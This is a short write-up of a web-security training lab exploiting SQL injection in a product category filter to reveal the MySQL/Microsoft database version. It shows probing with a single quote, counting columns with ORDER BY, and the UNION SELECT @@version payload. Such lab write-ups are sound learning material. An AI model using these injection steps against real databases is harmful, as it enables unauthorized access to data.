04 - SQL injection attack, querying the database type and version on MySQL and Microsoft

This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.To solve the lab, display the database version

Given : Injection point (Product category) , Database (MySQL/Microsoft)
End goal : Display the database version

Start the lab by clicking on the ACCESS THE LAB button

As usual , intercept the request in burp suit and click on the any category and then the intercepted request looks like :

This lab is similer to the previous lab. Putting the single quote gives 500 error which indicate the possibility of sqli. Then use order by method to find the number of the columns in the table. This lab also contain 2 columns in the table because ORDER BY 3 gives 500 error :

So the possible query that can be injected would be UNION SELECT @@version,NULL-- :

Note : Space at the end of comment which is require in MySql

Lab solved :

Prev Next

CAPA: The Basics01/02/25 ctf → thm → capa-the-basics

SQLMap: The Basics31/01/25 ctf → thm → sqlmap-the-basics

SQL Fundamentals31/01/25 ctf → thm → sql-fundamentals

Powershell30/01/25 programming → powershell